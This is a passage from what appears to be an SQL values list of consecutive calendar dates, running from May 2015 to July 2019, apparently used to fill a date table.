('2015-05-27'),
('2015-05-28'),
('2015-05-29'),
('2015-05-30'),
('2015-05-31'),
('2015-06-01'),
('2015-06-02'),
('2015-06-03'),
('2015-06-04'),
('2015-06-05'),
('2015-06-06'),
('2015-06-07'),
('2015-06-08'),
('2015-06-09'),
('2015-06-10'),
('2015-06-11'),
('2015-06-12'),
('2015-06-13'),
('2015-06-14'),
('2015-06-15'),
('2015-06-16'),
('2015-06-17'),
('2015-06-18'),
('2015-06-19'),
('2015-06-20'),
('2015-06-21'),
('2015-06-22'),
('2015-06-23'),
('2015-06-24'),
('2015-06-25'),
('2015-06-26'),
('2015-06-27'),
('2015-06-28'),
('2015-06-29'),
('2015-06-30'),
('2015-07-01'),
('2015-07-02'),
('2015-07-03'),
('2015-07-04'),
('2015-07-05'),
('2015-07-06'),
('2015-07-07'),
('2015-07-08'),
('2015-07-09'),
('2015-07-10'),
('2015-07-11'),
('2015-07-12'),
('2015-07-13'),
('2015-07-14'),
('2015-07-15'),
('2015-07-16'),
('2015-07-17'),
('2015-07-18'),
('2015-07-19'),
('2015-07-20'),
('2015-07-21'),
('2015-07-22'),
('2015-07-23'),
('2015-07-24'),
('2015-07-25'),
('2015-07-26'),
('2015-07-27'),
('2015-07-28'),
('2015-07-29'),
('2015-07-30'),
('2015-07-31'),
('2015-08-01'),
('2015-08-02'),
('2015-08-03'),
('2015-08-04'),
('2015-08-05'),
('2015-08-06'),
('2015-08-07'),
('2015-08-08'),
('2015-08-09'),
('2015-08-10'),
('2015-08-11'),
('2015-08-12'),
('2015-08-13'),
('2015-08-14'),
('2015-08-15'),
('2015-08-16'),
('2015-08-17'),
('2015-08-18'),
('2015-08-19'),
('2015-08-20'),
('2015-08-21'),
('2015-08-22'),
('2015-08-23'),
('2015-08-24'),
('2015-08-25'),
('2015-08-26'),
('2015-08-27'),
('2015-08-28'),
('2015-08-29'),
('2015-08-30'),
('2015-08-31'),
('2015-09-01'),
('2015-09-02'),
('2015-09-03'),
('2015-09-04'),
('2015-09-05'),
('2015-09-06'),
('2015-09-07'),
('2015-09-08'),
('2015-09-09'),
('2015-09-10'),
('2015-09-11'),
('2015-09-12'),
('2015-09-13'),
('2015-09-14'),
('2015-09-15'),
('2015-09-16'),
('2015-09-17'),
('2015-09-18'),
('2015-09-19'),
('2015-09-20'),
('2015-09-21'),
('2015-09-22'),
('2015-09-23'),
('2015-09-24'),
('2015-09-25'),
('2015-09-26'),
('2015-09-27'),
('2015-09-28'),
('2015-09-29'),
('2015-09-30'),
('2015-10-01'),
('2015-10-02'),
('2015-10-03'),
('2015-10-04'),
('2015-10-05'),
('2015-10-06'),
('2015-10-07'),
('2015-10-08'),
('2015-10-09'),
('2015-10-10'),
('2015-10-11'),
('2015-10-12'),
('2015-10-13'),
('2015-10-14'),
('2015-10-15'),
('2015-10-16'),
('2015-10-17'),
('2015-10-18'),
('2015-10-19'),
('2015-10-20'),
('2015-10-21'),
('2015-10-22'),
('2015-10-23'),
('2015-10-24'),
('2015-10-25'),
('2015-10-26'),
('2015-10-27'),
('2015-10-28'),
('2015-10-29'),
('2015-10-30'),
('2015-10-31'),
('2015-11-01'),
('2015-11-02'),
('2015-11-03'),
('2015-11-04'),
('2015-11-05'),
('2015-11-06'),
('2015-11-07'),
('2015-11-08'),
('2015-11-09'),
('2015-11-10'),
('2015-11-11'),
('2015-11-12'),
('2015-11-13'),
('2015-11-14'),
('2015-11-15'),
('2015-11-16'),
('2015-11-17'),
('2015-11-18'),
('2015-11-19'),
('2015-11-20'),
('2015-11-21'),
('2015-11-22'),
('2015-11-23'),
('2015-11-24'),
('2015-11-25'),
('2015-11-26'),
('2015-11-27'),
('2015-11-28'),
('2015-11-29'),
('2015-11-30'),
('2015-12-01'),
('2015-12-02'),
('2015-12-03'),
('2015-12-04'),
('2015-12-05'),
('2015-12-06'),
('2015-12-07'),
('2015-12-08'),
('2015-12-09'),
('2015-12-10'),
('2015-12-11'),
('2015-12-12'),
('2015-12-13'),
('2015-12-14'),
('2015-12-15'),
('2015-12-16'),
('2015-12-17'),
('2015-12-18'),
('2015-12-19'),
('2015-12-20'),
('2015-12-21'),
('2015-12-22'),
('2015-12-23'),
('2015-12-24'),
('2015-12-25'),
('2015-12-26'),
('2015-12-27'),
('2015-12-28'),
('2015-12-29'),
('2015-12-30'),
('2015-12-31'),
('2016-01-01'),
('2016-01-02'),
('2016-01-03'),
('2016-01-04'),
('2016-01-05'),
('2016-01-06'),
('2016-01-07'),
('2016-01-08'),
('2016-01-09'),
('2016-01-10'),
('2016-01-11'),
('2016-01-12'),
('2016-01-13'),
('2016-01-14'),
('2016-01-15'),
('2016-01-16'),
('2016-01-17'),
('2016-01-18'),
('2016-01-19'),
('2016-01-20'),
('2016-01-21'),
('2016-01-22'),
('2016-01-23'),
('2016-01-24'),
('2016-01-25'),
('2016-01-26'),
('2016-01-27'),
('2016-01-28'),
('2016-01-29'),
('2016-01-30'),
('2016-01-31'),
('2016-02-01'),
('2016-02-02'),
('2016-02-03'),
('2016-02-04'),
('2016-02-05'),
('2016-02-06'),
('2016-02-07'),
('2016-02-08'),
('2016-02-09'),
('2016-02-10'),
('2016-02-11'),
('2016-02-12'),
('2016-02-13'),
('2016-02-14'),
('2016-02-15'),
('2016-02-16'),
('2016-02-17'),
('2016-02-18'),
('2016-02-19'),
('2016-02-20'),
('2016-02-21'),
('2016-02-22'),
('2016-02-23'),
('2016-02-24'),
('2016-02-25'),
('2016-02-26'),
('2016-02-27'),
('2016-02-28'),
('2016-02-29'),
('2016-03-01'),
('2016-03-02'),
('2016-03-03'),
('2016-03-04'),
('2016-03-05'),
('2016-03-06'),
('2016-03-07'),
('2016-03-08'),
('2016-03-09'),
('2016-03-10'),
('2016-03-11'),
('2016-03-12'),
('2016-03-13'),
('2016-03-14'),
('2016-03-15'),
('2016-03-16'),
('2016-03-17'),
('2016-03-18'),
('2016-03-19'),
('2016-03-20'),
('2016-03-21'),
('2016-03-22'),
('2016-03-23'),
('2016-03-24'),
('2016-03-25'),
('2016-03-26'),
('2016-03-27'),
('2016-03-28'),
('2016-03-29'),
('2016-03-30'),
('2016-03-31'),
('2016-04-01'),
('2016-04-02'),
('2016-04-03'),
('2016-04-04'),
('2016-04-05'),
('2016-04-06'),
('2016-04-07'),
('2016-04-08'),
('2016-04-09'),
('2016-04-10'),
('2016-04-11'),
('2016-04-12'),
('2016-04-13'),
('2016-04-14'),
('2016-04-15'),
('2016-04-16'),
('2016-04-17'),
('2016-04-18'),
('2016-04-19'),
('2016-04-20'),
('2016-04-21'),
('2016-04-22'),
('2016-04-23'),
('2016-04-24'),
('2016-04-25'),
('2016-04-26'),
('2016-04-27'),
('2016-04-28'),
('2016-04-29'),
('2016-04-30'),
('2016-05-01'),
('2016-05-02'),
('2016-05-03'),
('2016-05-04'),
('2016-05-05'),
('2016-05-06'),
('2016-05-07'),
('2016-05-08'),
('2016-05-09'),
('2016-05-10'),
('2016-05-11'),
('2016-05-12'),
('2016-05-13'),
('2016-05-14'),
('2016-05-15'),
('2016-05-16'),
('2016-05-17'),
('2016-05-18'),
('2016-05-19'),
('2016-05-20'),
('2016-05-21'),
('2016-05-22'),
('2016-05-23'),
('2016-05-24'),
('2016-05-25'),
('2016-05-26'),
('2016-05-27'),
('2016-05-28'),
('2016-05-29'),
('2016-05-30'),
('2016-05-31'),
('2016-06-01'),
('2016-06-02'),
('2016-06-03'),
('2016-06-04'),
('2016-06-05'),
('2016-06-06'),
('2016-06-07'),
('2016-06-08'),
('2016-06-09'),
('2016-06-10'),
('2016-06-11'),
('2016-06-12'),
('2016-06-13'),
('2016-06-14'),
('2016-06-15'),
('2016-06-16'),
('2016-06-17'),
('2016-06-18'),
('2016-06-19'),
('2016-06-20'),
('2016-06-21'),
('2016-06-22'),
('2016-06-23'),
('2016-06-24'),
('2016-06-25'),
('2016-06-26'),
('2016-06-27'),
('2016-06-28'),
('2016-06-29'),
('2016-06-30'),
('2016-07-01'),
('2016-07-02'),
('2016-07-03'),
('2016-07-04'),
('2016-07-05'),
('2016-07-06'),
('2016-07-07'),
('2016-07-08'),
('2016-07-09'),
('2016-07-10'),
('2016-07-11'),
('2016-07-12'),
('2016-07-13'),
('2016-07-14'),
('2016-07-15'),
('2016-07-16'),
('2016-07-17'),
('2016-07-18'),
('2016-07-19'),
('2016-07-20'),
('2016-07-21'),
('2016-07-22'),
('2016-07-23'),
('2016-07-24'),
('2016-07-25'),
('2016-07-26'),
('2016-07-27'),
('2016-07-28'),
('2016-07-29'),
('2016-07-30'),
('2016-07-31'),
('2016-08-01'),
('2016-08-02'),
('2016-08-03'),
('2016-08-04'),
('2016-08-05'),
('2016-08-06'),
('2016-08-07'),
('2016-08-08'),
('2016-08-09'),
('2016-08-10'),
('2016-08-11'),
('2016-08-12'),
('2016-08-13'),
('2016-08-14'),
('2016-08-15'),
('2016-08-16'),
('2016-08-17'),
('2016-08-18'),
('2016-08-19'),
('2016-08-20'),
('2016-08-21'),
('2016-08-22'),
('2016-08-23'),
('2016-08-24'),
('2016-08-25'),
('2016-08-26'),
('2016-08-27'),
('2016-08-28'),
('2016-08-29'),
('2016-08-30'),
('2016-08-31'),
('2016-09-01'),
('2016-09-02'),
('2016-09-03'),
('2016-09-04'),
('2016-09-05'),
('2016-09-06'),
('2016-09-07'),
('2016-09-08'),
('2016-09-09'),
('2016-09-10'),
('2016-09-11'),
('2016-09-12'),
('2016-09-13'),
('2016-09-14'),
('2016-09-15'),
('2016-09-16'),
('2016-09-17'),
('2016-09-18'),
('2016-09-19'),
('2016-09-20'),
('2016-09-21'),
('2016-09-22'),
('2016-09-23'),
('2016-09-24'),
('2016-09-25'),
('2016-09-26'),
('2016-09-27'),
('2016-09-28'),
('2016-09-29'),
('2016-09-30'),
('2016-10-01'),
('2016-10-02'),
('2016-10-03'),
('2016-10-04'),
('2016-10-05'),
('2016-10-06'),
('2016-10-07'),
('2016-10-08'),
('2016-10-09'),
('2016-10-10'),
('2016-10-11'),
('2016-10-12'),
('2016-10-13'),
('2016-10-14'),
('2016-10-15'),
('2016-10-16'),
('2016-10-17'),
('2016-10-18'),
('2016-10-19'),
('2016-10-20'),
('2016-10-21'),
('2016-10-22'),
('2016-10-23'),
('2016-10-24'),
('2016-10-25'),
('2016-10-26'),
('2016-10-27'),
('2016-10-28'),
('2016-10-29'),
('2016-10-30'),
('2016-10-31'),
('2016-11-01'),
('2016-11-02'),
('2016-11-03'),
('2016-11-04'),
('2016-11-05'),
('2016-11-06'),
('2016-11-07'),
('2016-11-08'),
('2016-11-09'),
('2016-11-10'),
('2016-11-11'),
('2016-11-12'),
('2016-11-13'),
('2016-11-14'),
('2016-11-15'),
('2016-11-16'),
('2016-11-17'),
('2016-11-18'),
('2016-11-19'),
('2016-11-20'),
('2016-11-21'),
('2016-11-22'),
('2016-11-23'),
('2016-11-24'),
('2016-11-25'),
('2016-11-26'),
('2016-11-27'),
('2016-11-28'),
('2016-11-29'),
('2016-11-30'),
('2016-12-01'),
('2016-12-02'),
('2016-12-03'),
('2016-12-04'),
('2016-12-05'),
('2016-12-06'),
('2016-12-07'),
('2016-12-08'),
('2016-12-09'),
('2016-12-10'),
('2016-12-11'),
('2016-12-12'),
('2016-12-13'),
('2016-12-14'),
('2016-12-15'),
('2016-12-16'),
('2016-12-17'),
('2016-12-18'),
('2016-12-19'),
('2016-12-20'),
('2016-12-21'),
('2016-12-22'),
('2016-12-23'),
('2016-12-24'),
('2016-12-25'),
('2016-12-26'),
('2016-12-27'),
('2016-12-28'),
('2016-12-29'),
('2016-12-30'),
('2016-12-31'),
('2017-01-01'),
('2017-01-02'),
('2017-01-03'),
('2017-01-04'),
('2017-01-05'),
('2017-01-06'),
('2017-01-07'),
('2017-01-08'),
('2017-01-09'),
('2017-01-10'),
('2017-01-11'),
('2017-01-12'),
('2017-01-13'),
('2017-01-14'),
('2017-01-15'),
('2017-01-16'),
('2017-01-17'),
('2017-01-18'),
('2017-01-19'),
('2017-01-20'),
('2017-01-21'),
('2017-01-22'),
('2017-01-23'),
('2017-01-24'),
('2017-01-25'),
('2017-01-26'),
('2017-01-27'),
('2017-01-28'),
('2017-01-29'),
('2017-01-30'),
('2017-01-31'),
('2017-02-01'),
('2017-02-02'),
('2017-02-03'),
('2017-02-04'),
('2017-02-05'),
('2017-02-06'),
('2017-02-07'),
('2017-02-08'),
('2017-02-09'),
('2017-02-10'),
('2017-02-11'),
('2017-02-12'),
('2017-02-13'),
('2017-02-14'),
('2017-02-15'),
('2017-02-16'),
('2017-02-17'),
('2017-02-18'),
('2017-02-19'),
('2017-02-20'),
('2017-02-21'),
('2017-02-22'),
('2017-02-23'),
('2017-02-24'),
('2017-02-25'),
('2017-02-26'),
('2017-02-27'),
('2017-02-28'),
('2017-03-01'),
('2017-03-02'),
('2017-03-03'),
('2017-03-04'),
('2017-03-05'),
('2017-03-06'),
('2017-03-07'),
('2017-03-08'),
('2017-03-09'),
('2017-03-10'),
('2017-03-11'),
('2017-03-12'),
('2017-03-13'),
('2017-03-14'),
('2017-03-15'),
('2017-03-16'),
('2017-03-17'),
('2017-03-18'),
('2017-03-19'),
('2017-03-20'),
('2017-03-21'),
('2017-03-22'),
('2017-03-23'),
('2017-03-24'),
('2017-03-25'),
('2017-03-26'),
('2017-03-27'),
('2017-03-28'),
('2017-03-29'),
('2017-03-30'),
('2017-03-31'),
('2017-04-01'),
('2017-04-02'),
('2017-04-03'),
('2017-04-04'),
('2017-04-05'),
('2017-04-06'),
('2017-04-07'),
('2017-04-08'),
('2017-04-09'),
('2017-04-10'),
('2017-04-11'),
('2017-04-12'),
('2017-04-13'),
('2017-04-14'),
('2017-04-15'),
('2017-04-16'),
('2017-04-17'),
('2017-04-18'),
('2017-04-19'),
('2017-04-20'),
('2017-04-21'),
('2017-04-22'),
('2017-04-23'),
('2017-04-24'),
('2017-04-25'),
('2017-04-26'),
('2017-04-27'),
('2017-04-28'),
('2017-04-29'),
('2017-04-30'),
('2017-05-01'),
('2017-05-02'),
('2017-05-03'),
('2017-05-04'),
('2017-05-05'),
('2017-05-06'),
('2017-05-07'),
('2017-05-08'),
('2017-05-09'),
('2017-05-10'),
('2017-05-11'),
('2017-05-12'),
('2017-05-13'),
('2017-05-14'),
('2017-05-15'),
('2017-05-16'),
('2017-05-17'),
('2017-05-18'),
('2017-05-19'),
('2017-05-20'),
('2017-05-21'),
('2017-05-22'),
('2017-05-23'),
('2017-05-24'),
('2017-05-25'),
('2017-05-26'),
('2017-05-27'),
('2017-05-28'),
('2017-05-29'),
('2017-05-30'),
('2017-05-31'),
('2017-06-01'),
('2017-06-02'),
('2017-06-03'),
('2017-06-04'),
('2017-06-05'),
('2017-06-06'),
('2017-06-07'),
('2017-06-08'),
('2017-06-09'),
('2017-06-10'),
('2017-06-11'),
('2017-06-12'),
('2017-06-13'),
('2017-06-14'),
('2017-06-15'),
('2017-06-16'),
('2017-06-17'),
('2017-06-18'),
('2017-06-19'),
('2017-06-20'),
('2017-06-21'),
('2017-06-22'),
('2017-06-23'),
('2017-06-24'),
('2017-06-25'),
('2017-06-26'),
('2017-06-27'),
('2017-06-28'),
('2017-06-29'),
('2017-06-30'),
('2017-07-01'),
('2017-07-02'),
('2017-07-03'),
('2017-07-04'),
('2017-07-05'),
('2017-07-06'),
('2017-07-07'),
('2017-07-08'),
('2017-07-09'),
('2017-07-10'),
('2017-07-11'),
('2017-07-12'),
('2017-07-13'),
('2017-07-14'),
('2017-07-15'),
('2017-07-16'),
('2017-07-17'),
('2017-07-18'),
('2017-07-19'),
('2017-07-20'),
('2017-07-21'),
('2017-07-22'),
('2017-07-23'),
('2017-07-24'),
('2017-07-25'),
('2017-07-26'),
('2017-07-27'),
('2017-07-28'),
('2017-07-29'),
('2017-07-30'),
('2017-07-31'),
('2017-08-01'),
('2017-08-02'),
('2017-08-03'),
('2017-08-04'),
('2017-08-05'),
('2017-08-06'),
('2017-08-07'),
('2017-08-08'),
('2017-08-09'),
('2017-08-10'),
('2017-08-11'),
('2017-08-12'),
('2017-08-13'),
('2017-08-14'),
('2017-08-15'),
('2017-08-16'),
('2017-08-17'),
('2017-08-18'),
('2017-08-19'),
('2017-08-20'),
('2017-08-21'),
('2017-08-22'),
('2017-08-23'),
('2017-08-24'),
('2017-08-25'),
('2017-08-26'),
('2017-08-27'),
('2017-08-28'),
('2017-08-29'),
('2017-08-30'),
('2017-08-31'),
('2017-09-01'),
('2017-09-02'),
('2017-09-03'),
('2017-09-04'),
('2017-09-05'),
('2017-09-06'),
('2017-09-07'),
('2017-09-08'),
('2017-09-09'),
('2017-09-10'),
('2017-09-11'),
('2017-09-12'),
('2017-09-13'),
('2017-09-14'),
('2017-09-15'),
('2017-09-16'),
('2017-09-17'),
('2017-09-18'),
('2017-09-19'),
('2017-09-20'),
('2017-09-21'),
('2017-09-22'),
('2017-09-23'),
('2017-09-24'),
('2017-09-25'),
('2017-09-26'),
('2017-09-27'),
('2017-09-28'),
('2017-09-29'),
('2017-09-30'),
('2017-10-01'),
('2017-10-02'),
('2017-10-03'),
('2017-10-04'),
('2017-10-05'),
('2017-10-06'),
('2017-10-07'),
('2017-10-08'),
('2017-10-09'),
('2017-10-10'),
('2017-10-11'),
('2017-10-12'),
('2017-10-13'),
('2017-10-14'),
('2017-10-15'),
('2017-10-16'),
('2017-10-17'),
('2017-10-18'),
('2017-10-19'),
('2017-10-20'),
('2017-10-21'),
('2017-10-22'),
('2017-10-23'),
('2017-10-24'),
('2017-10-25'),
('2017-10-26'),
('2017-10-27'),
('2017-10-28'),
('2017-10-29'),
('2017-10-30'),
('2017-10-31'),
('2017-11-01'),
('2017-11-02'),
('2017-11-03'),
('2017-11-04'),
('2017-11-05'),
('2017-11-06'),
('2017-11-07'),
('2017-11-08'),
('2017-11-09'),
('2017-11-10'),
('2017-11-11'),
('2017-11-12'),
('2017-11-13'),
('2017-11-14'),
('2017-11-15'),
('2017-11-16'),
('2017-11-17'),
('2017-11-18'),
('2017-11-19'),
('2017-11-20'),
('2017-11-21'),
('2017-11-22'),
('2017-11-23'),
('2017-11-24'),
('2017-11-25'),
('2017-11-26'),
('2017-11-27'),
('2017-11-28'),
('2017-11-29'),
('2017-11-30'),
('2017-12-01'),
('2017-12-02'),
('2017-12-03'),
('2017-12-04'),
('2017-12-05'),
('2017-12-06'),
('2017-12-07'),
('2017-12-08'),
('2017-12-09'),
('2017-12-10'),
('2017-12-11'),
('2017-12-12'),
('2017-12-13'),
('2017-12-14'),
('2017-12-15'),
('2017-12-16'),
('2017-12-17'),
('2017-12-18'),
('2017-12-19'),
('2017-12-20'),
('2017-12-21'),
('2017-12-22'),
('2017-12-23'),
('2017-12-24'),
('2017-12-25'),
('2017-12-26'),
('2017-12-27'),
('2017-12-28'),
('2017-12-29'),
('2017-12-30'),
('2017-12-31'),
('2018-01-01'),
('2018-01-02'),
('2018-01-03'),
('2018-01-04'),
('2018-01-05'),
('2018-01-06'),
('2018-01-07'),
('2018-01-08'),
('2018-01-09'),
('2018-01-10'),
('2018-01-11'),
('2018-01-12'),
('2018-01-13'),
('2018-01-14'),
('2018-01-15'),
('2018-01-16'),
('2018-01-17'),
('2018-01-18'),
('2018-01-19'),
('2018-01-20'),
('2018-01-21'),
('2018-01-22'),
('2018-01-23'),
('2018-01-24'),
('2018-01-25'),
('2018-01-26'),
('2018-01-27'),
('2018-01-28'),
('2018-01-29'),
('2018-01-30'),
('2018-01-31'),
('2018-02-01'),
('2018-02-02'),
('2018-02-03'),
('2018-02-04'),
('2018-02-05'),
('2018-02-06'),
('2018-02-07'),
('2018-02-08'),
('2018-02-09'),
('2018-02-10'),
('2018-02-11'),
('2018-02-12'),
('2018-02-13'),
('2018-02-14'),
('2018-02-15'),
('2018-02-16'),
('2018-02-17'),
('2018-02-18'),
('2018-02-19'),
('2018-02-20'),
('2018-02-21'),
('2018-02-22'),
('2018-02-23'),
('2018-02-24'),
('2018-02-25'),
('2018-02-26'),
('2018-02-27'),
('2018-02-28'),
('2018-03-01'),
('2018-03-02'),
('2018-03-03'),
('2018-03-04'),
('2018-03-05'),
('2018-03-06'),
('2018-03-07'),
('2018-03-08'),
('2018-03-09'),
('2018-03-10'),
('2018-03-11'),
('2018-03-12'),
('2018-03-13'),
('2018-03-14'),
('2018-03-15'),
('2018-03-16'),
('2018-03-17'),
('2018-03-18'),
('2018-03-19'),
('2018-03-20'),
('2018-03-21'),
('2018-03-22'),
('2018-03-23'),
('2018-03-24'),
('2018-03-25'),
('2018-03-26'),
('2018-03-27'),
('2018-03-28'),
('2018-03-29'),
('2018-03-30'),
('2018-03-31'),
('2018-04-01'),
('2018-04-02'),
('2018-04-03'),
('2018-04-04'),
('2018-04-05'),
('2018-04-06'),
('2018-04-07'),
('2018-04-08'),
('2018-04-09'),
('2018-04-10'),
('2018-04-11'),
('2018-04-12'),
('2018-04-13'),
('2018-04-14'),
('2018-04-15'),
('2018-04-16'),
('2018-04-17'),
('2018-04-18'),
('2018-04-19'),
('2018-04-20'),
('2018-04-21'),
('2018-04-22'),
('2018-04-23'),
('2018-04-24'),
('2018-04-25'),
('2018-04-26'),
('2018-04-27'),
('2018-04-28'),
('2018-04-29'),
('2018-04-30'),
('2018-05-01'),
('2018-05-02'),
('2018-05-03'),
('2018-05-04'),
('2018-05-05'),
('2018-05-06'),
('2018-05-07'),
('2018-05-08'),
('2018-05-09'),
('2018-05-10'),
('2018-05-11'),
('2018-05-12'),
('2018-05-13'),
('2018-05-14'),
('2018-05-15'),
('2018-05-16'),
('2018-05-17'),
('2018-05-18'),
('2018-05-19'),
('2018-05-20'),
('2018-05-21'),
('2018-05-22'),
('2018-05-23'),
('2018-05-24'),
('2018-05-25'),
('2018-05-26'),
('2018-05-27'),
('2018-05-28'),
('2018-05-29'),
('2018-05-30'),
('2018-05-31'),
('2018-06-01'),
('2018-06-02'),
('2018-06-03'),
('2018-06-04'),
('2018-06-05'),
('2018-06-06'),
('2018-06-07'),
('2018-06-08'),
('2018-06-09'),
('2018-06-10'),
('2018-06-11'),
('2018-06-12'),
('2018-06-13'),
('2018-06-14'),
('2018-06-15'),
('2018-06-16'),
('2018-06-17'),
('2018-06-18'),
('2018-06-19'),
('2018-06-20'),
('2018-06-21'),
('2018-06-22'),
('2018-06-23'),
('2018-06-24'),
('2018-06-25'),
('2018-06-26'),
('2018-06-27'),
('2018-06-28'),
('2018-06-29'),
('2018-06-30'),
('2018-07-01'),
('2018-07-02'),
('2018-07-03'),
('2018-07-04'),
('2018-07-05'),
('2018-07-06'),
('2018-07-07'),
('2018-07-08'),
('2018-07-09'),
('2018-07-10'),
('2018-07-11'),
('2018-07-12'),
('2018-07-13'),
('2018-07-14'),
('2018-07-15'),
('2018-07-16'),
('2018-07-17'),
('2018-07-18'),
('2018-07-19'),
('2018-07-20'),
('2018-07-21'),
('2018-07-22'),
('2018-07-23'),
('2018-07-24'),
('2018-07-25'),
('2018-07-26'),
('2018-07-27'),
('2018-07-28'),
('2018-07-29'),
('2018-07-30'),
('2018-07-31'),
('2018-08-01'),
('2018-08-02'),
('2018-08-03'),
('2018-08-04'),
('2018-08-05'),
('2018-08-06'),
('2018-08-07'),
('2018-08-08'),
('2018-08-09'),
('2018-08-10'),
('2018-08-11'),
('2018-08-12'),
('2018-08-13'),
('2018-08-14'),
('2018-08-15'),
('2018-08-16'),
('2018-08-17'),
('2018-08-18'),
('2018-08-19'),
('2018-08-20'),
('2018-08-21'),
('2018-08-22'),
('2018-08-23'),
('2018-08-24'),
('2018-08-25'),
('2018-08-26'),
('2018-08-27'),
('2018-08-28'),
('2018-08-29'),
('2018-08-30'),
('2018-08-31'),
('2018-09-01'),
('2018-09-02'),
('2018-09-03'),
('2018-09-04'),
('2018-09-05'),
('2018-09-06'),
('2018-09-07'),
('2018-09-08'),
('2018-09-09'),
('2018-09-10'),
('2018-09-11'),
('2018-09-12'),
('2018-09-13'),
('2018-09-14'),
('2018-09-15'),
('2018-09-16'),
('2018-09-17'),
('2018-09-18'),
('2018-09-19'),
('2018-09-20'),
('2018-09-21'),
('2018-09-22'),
('2018-09-23'),
('2018-09-24'),
('2018-09-25'),
('2018-09-26'),
('2018-09-27'),
('2018-09-28'),
('2018-09-29'),
('2018-09-30'),
('2018-10-01'),
('2018-10-02'),
('2018-10-03'),
('2018-10-04'),
('2018-10-05'),
('2018-10-06'),
('2018-10-07'),
('2018-10-08'),
('2018-10-09'),
('2018-10-10'),
('2018-10-11'),
('2018-10-12'),
('2018-10-13'),
('2018-10-14'),
('2018-10-15'),
('2018-10-16'),
('2018-10-17'),
('2018-10-18'),
('2018-10-19'),
('2018-10-20'),
('2018-10-21'),
('2018-10-22'),
('2018-10-23'),
('2018-10-24'),
('2018-10-25'),
('2018-10-26'),
('2018-10-27'),
('2018-10-28'),
('2018-10-29'),
('2018-10-30'),
('2018-10-31'),
('2018-11-01'),
('2018-11-02'),
('2018-11-03'),
('2018-11-04'),
('2018-11-05'),
('2018-11-06'),
('2018-11-07'),
('2018-11-08'),
('2018-11-09'),
('2018-11-10'),
('2018-11-11'),
('2018-11-12'),
('2018-11-13'),
('2018-11-14'),
('2018-11-15'),
('2018-11-16'),
('2018-11-17'),
('2018-11-18'),
('2018-11-19'),
('2018-11-20'),
('2018-11-21'),
('2018-11-22'),
('2018-11-23'),
('2018-11-24'),
('2018-11-25'),
('2018-11-26'),
('2018-11-27'),
('2018-11-28'),
('2018-11-29'),
('2018-11-30'),
('2018-12-01'),
('2018-12-02'),
('2018-12-03'),
('2018-12-04'),
('2018-12-05'),
('2018-12-06'),
('2018-12-07'),
('2018-12-08'),
('2018-12-09'),
('2018-12-10'),
('2018-12-11'),
('2018-12-12'),
('2018-12-13'),
('2018-12-14'),
('2018-12-15'),
('2018-12-16'),
('2018-12-17'),
('2018-12-18'),
('2018-12-19'),
('2018-12-20'),
('2018-12-21'),
('2018-12-22'),
('2018-12-23'),
('2018-12-24'),
('2018-12-25'),
('2018-12-26'),
('2018-12-27'),
('2018-12-28'),
('2018-12-29'),
('2018-12-30'),
('2018-12-31'),
('2019-01-01'),
('2019-01-02'),
('2019-01-03'),
('2019-01-04'),
('2019-01-05'),
('2019-01-06'),
('2019-01-07'),
('2019-01-08'),
('2019-01-09'),
('2019-01-10'),
('2019-01-11'),
('2019-01-12'),
('2019-01-13'),
('2019-01-14'),
('2019-01-15'),
('2019-01-16'),
('2019-01-17'),
('2019-01-18'),
('2019-01-19'),
('2019-01-20'),
('2019-01-21'),
('2019-01-22'),
('2019-01-23'),
('2019-01-24'),
('2019-01-25'),
('2019-01-26'),
('2019-01-27'),
('2019-01-28'),
('2019-01-29'),
('2019-01-30'),
('2019-01-31'),
('2019-02-01'),
('2019-02-02'),
('2019-02-03'),
('2019-02-04'),
('2019-02-05'),
('2019-02-06'),
('2019-02-07'),
('2019-02-08'),
('2019-02-09'),
('2019-02-10'),
('2019-02-11'),
('2019-02-12'),
('2019-02-13'),
('2019-02-14'),
('2019-02-15'),
('2019-02-16'),
('2019-02-17'),
('2019-02-18'),
('2019-02-19'),
('2019-02-20'),
('2019-02-21'),
('2019-02-22'),
('2019-02-23'),
('2019-02-24'),
('2019-02-25'),
('2019-02-26'),
('2019-02-27'),
('2019-02-28'),
('2019-03-01'),
('2019-03-02'),
('2019-03-03'),
('2019-03-04'),
('2019-03-05'),
('2019-03-06'),
('2019-03-07'),
('2019-03-08'),
('2019-03-09'),
('2019-03-10'),
('2019-03-11'),
('2019-03-12'),
('2019-03-13'),
('2019-03-14'),
('2019-03-15'),
('2019-03-16'),
('2019-03-17'),
('2019-03-18'),
('2019-03-19'),
('2019-03-20'),
('2019-03-21'),
('2019-03-22'),
('2019-03-23'),
('2019-03-24'),
('2019-03-25'),
('2019-03-26'),
('2019-03-27'),
('2019-03-28'),
('2019-03-29'),
('2019-03-30'),
('2019-03-31'),
('2019-04-01'),
('2019-04-02'),
('2019-04-03'),
('2019-04-04'),
('2019-04-05'),
('2019-04-06'),
('2019-04-07'),
('2019-04-08'),
('2019-04-09'),
('2019-04-10'),
('2019-04-11'),
('2019-04-12'),
('2019-04-13'),
('2019-04-14'),
('2019-04-15'),
('2019-04-16'),
('2019-04-17'),
('2019-04-18'),
('2019-04-19'),
('2019-04-20'),
('2019-04-21'),
('2019-04-22'),
('2019-04-23'),
('2019-04-24'),
('2019-04-25'),
('2019-04-26'),
('2019-04-27'),
('2019-04-28'),
('2019-04-29'),
('2019-04-30'),
('2019-05-01'),
('2019-05-02'),
('2019-05-03'),
('2019-05-04'),
('2019-05-05'),
('2019-05-06'),
('2019-05-07'),
('2019-05-08'),
('2019-05-09'),
('2019-05-10'),
('2019-05-11'),
('2019-05-12'),
('2019-05-13'),
('2019-05-14'),
('2019-05-15'),
('2019-05-16'),
('2019-05-17'),
('2019-05-18'),
('2019-05-19'),
('2019-05-20'),
('2019-05-21'),
('2019-05-22'),
('2019-05-23'),
('2019-05-24'),
('2019-05-25'),
('2019-05-26'),
('2019-05-27'),
('2019-05-28'),
('2019-05-29'),
('2019-05-30'),
('2019-05-31'),
('2019-06-01'),
('2019-06-02'),
('2019-06-03'),
('2019-06-04'),
('2019-06-05'),
('2019-06-06'),
('2019-06-07'),
('2019-06-08'),
('2019-06-09'),
('2019-06-10'),
('2019-06-11'),
('2019-06-12'),
('2019-06-13'),
('2019-06-14'),
('2019-06-15'),
('2019-06-16'),
('2019-06-17'),
('2019-06-18'),
('2019-06-19'),
('2019-06-20'),
('2019-06-21'),
('2019-06-22'),
('2019-06-23'),
('2019-06-24'),
('2019-06-25'),
('2019-06-26'),
('2019-06-27'),
('2019-06-28'),
('2019-06-29'),
('2019-06-30'),
('2019-07-01'),
('2019-07-02'),
('2019-07-03'),
('2019-07-04'),
